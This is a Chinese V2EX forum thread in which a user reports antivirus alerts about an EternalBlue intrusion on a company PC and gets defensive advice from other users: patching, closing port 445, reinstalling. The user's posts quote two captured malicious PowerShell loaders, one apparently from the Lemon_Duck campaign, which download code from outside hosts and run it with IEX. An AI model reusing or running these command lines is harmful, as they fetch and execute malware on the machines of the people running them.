V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
shadowyue
V2EX  ›  程序员

公司电脑,火绒提示被攻击,这是啥情况

  •  
  •   shadowyue · 333 天前 · 5204 次点击
    这是一个创建于 333 天前的主题,其中的信息可能已经有所发展或是发生改变。

    操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

    命令行:powershell -c "try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='1cd2db7421c0b88eb89eb6182bd6785e';$ifp=$env:tmp+'\if.bin';$down_url='http://207.154.225.82';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$.ToString('X2')};return $s}if(test-path $ifp){$con=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(New-Object Net.WebClient)."downloaddata"($down_url+'/if.bin?SZXHRZZLIT036&9CBD7D74-E8C3-6E51-230D-12457CECDB29&DC:4A:3E:76:02:A0');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}IEX(-join[char[]]$con)"

    攻击方式:Exploit/EternalBlue

    远程地址:10.83.3.33:445

    防御结果:已阻止

    37 条回复    2020-05-20 22:06:07 +08:00
    BrettD
        1
    BrettD   333 天前 via iPhone
    勒索软件的感觉
    shadowyue
        2
    shadowyue   333 天前
    http://207.154.225.82
    这个地址我还能访问,是个 nginx
    crab
        3
    crab   333 天前
    局域网没打那补丁?
    phpinfos
        4
    phpinfos   333 天前
    永恒之蓝 445 端口关掉 打补丁
    shadowyue
        5
    shadowyue   333 天前
    @crab 啥补丁
    shadowyue
        6
    shadowyue   333 天前
    @phpinfos 这个东西严重吗,要跟公司 IT 讲吗
    phpinfos
        7
    phpinfos   333 天前
    @shadowyue
    一般会跟勒索病毒绑在一起,小心为好,赶紧修复吧
    补丁: https://technet.microsoft.com/zh-cn/library/security/MS17-010
    Osk
        8
    Osk   333 天前
    看这样子怎么像 smb v1 的漏洞补丁没打?
    Osk
        9
    Osk   333 天前
    不需要共享打印机和文件夹的话可以先在防火墙里面把本机的 445 等 smb service 端口关闭了,毕竟看样子你是在毒窝里面了🤣
    shadowyue
        10
    shadowyue   333 天前
    淦哦,公司 win10 没法更新补丁
    shadowyue
        11
    shadowyue   333 天前
    @Osk 毒窝吗,公司好多人正上班呢,跟 it 讲了没回我呢,还好火绒帮我挡住了
    shadowyue
        12
    shadowyue   333 天前
    it 说自己杀毒就行,一直都有这个病毒🤣
    Osk
        13
    Osk   333 天前
    @shadowyue 永恒之蓝在没打补丁或做防护措施的局域网中传播很快的。

    win7, win8, win 10 <1703 (好像是这个版本)都会中招。很好奇 win 10 没法更新补丁是什么情况?
    win10 打补丁比 win7 方便多了,只需要去下载最近的月度累计更新手动安装也很方便。


    作为用户,不想打补丁就先把本机的 445、135、137、138、139 端口关闭了,除非你需要共享打印机或者文件给别人。毕竟万一火绒没拦住就惨了
    Osk
        14
    Osk   333 天前
    另外,看你们内网的 ip 都是 10 的,看起来是大公司了,it 都这么水吗 /doge/
    shadowyue
        15
    shadowyue   333 天前
    @Osk 公司好像没几个人用 win10,我更新一直都是提示失败了,不知道为啥。

    我被攻击了 powershell 这个程序就疯狂跑吃 cpu,好奇别人没这个问题吗,电脑卡爆了应该有别人反馈才对。

    公司是蛮大的,工作累了直接睡,没问题 🤣
    Osk
        16
    Osk   333 天前
    公司上外网需要使用代理吗?

    吃 cpu 而不搞你的文件的话,看起来像挖矿的程序,危害也。。。不大吧 /滑稽 /
    shadowyue
        17
    shadowyue   333 天前
    @Osk 不用,但是禁止了一些娱乐网站,我自己挂代理可以浏览,哈哈
    按你说的吧 445 端口关闭了,貌似已经没问题了,谢谢你
    shadowyue
        18
    shadowyue   333 天前
    @Osk 大佬救救我,这又是啥

    操作进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    命令行:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -c "$Lemon_Duck='1EdJ95\kmSXYuMOLF1';$x='t.awc'+'na.com';;$y='http://'+$x+'/x.js';$z=$y+'p?ipc_20200228';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"

    风险分类:木马盗号

    访问网址:t.awcna.com/x.js

    操作结果:已阻止
    Shazoo
        19
    Shazoo   333 天前
    下载 http://t.awcna.com/x.js ,如果程序的 md5=a49add2a8eeb7e89b9d743c0af0e1443,执行之。

    https://x.threatbook.cn/nodev4/domain/awcna.com 看看细节呗。
    Osk
        20
    Osk   333 天前
    @shadowyue 看来一开始火绒并没有拦住病毒。。。先把 powershell 进程结束了看是否再生,建议断网杀毒。必要的话重装了。
    shadowyue
        21
    shadowyue   333 天前
    @Shazoo 这个 js 文件从浏览器访问不到
    shadowyue
        22
    shadowyue   333 天前
    @Osk 杀了隔十几分钟会又出来,在杀毒了,试试
    ThirdFlame
        23
    ThirdFlame   333 天前   ❤️ 1
    你的电脑已经被控制了。 通过 powershell 执行恶意代码 ing
    shadowyue
        24
    shadowyue   333 天前
    @ThirdFlame 怎么处理啊,大佬
    WordTian
        25
    WordTian   333 天前 via Android
    备份好重要文件,重装系统吧,联网前关掉 445 端口
    juded
        26
    juded   333 天前
    火绒行为管理不错,但查杀能力太差了。
    vocaloid
        27
    vocaloid   333 天前
    把 powershell 进程先杀掉啊。。要不还会干更多的事情
    ihacku
        28
    ihacku   333 天前 via iPhone
    这个动作本身已经被拦截了
    你没有打补丁,可以在火绒里面打下补丁重启生效
    可以通知 IT 发下 10.83.3.33 这台机器中毒了 杀毒打补丁
    内网应该不止这一台被感染的
    Osk
        29
    Osk   333 天前
    @shadowyue 那我还是建议重装了, 如果非要清理, 最好进入离线系统, 使用其它杀毒软件对 C 盘全盘扫描, 离线的原因是避免恶意程序对自身做隐藏或者干扰.

    查杀完成后, 还需要在离线系统(干净的 PE 中)使用 autoruns 等工具对所有的 驱动, 服务, 自启动等项目手工排查, 一些恶意程序隐藏的很好, 我觉得这一步是必须的.

    最后问题来了: 都这么麻烦了, 还不如重装.


    重装后: 先不要联网, 防火墙关闭 smb v1(445), rdp(3389) 等端口, 不然处在毒窝中分分钟死灰复燃. 不过, 使用最新的 Windows 10 1909 镜像也不要太紧张, 大部分局域网传播的严重漏洞已经封好了.
    wanguorui123
        30
    wanguorui123   333 天前
    永恒之蓝的变种蠕虫病毒有点多
    Ailoli
        31
    Ailoli   333 天前
    之前公司同事电脑出现过,后面断网全盘查杀就解决了
    jousca
        32
    jousca   333 天前
    内网里攻击你那台电脑中了蠕虫,永恒之蓝漏洞。
    manami
        33
    manami   333 天前 via Android
    你需要卡巴斯基!
    Buges
        34
    Buges   333 天前 via Android
    emptyiscolor
        35
    emptyiscolor   332 天前
    @shadowyue 利用驱动人生后门进行传播的木马,建议直接重装系统然后安装主流杀软吧
    zdswater
        36
    zdswater   251 天前
    中奖了,火绒扫了一遍杀了还有。不知道咋处理了
    关于   ·   帮助文档   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2780 人在线   最高记录 5497   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 00:42 · PVG 08:42 · LAX 16:42 · JFK 19:42
    ♥ Do have faith in what you're doing.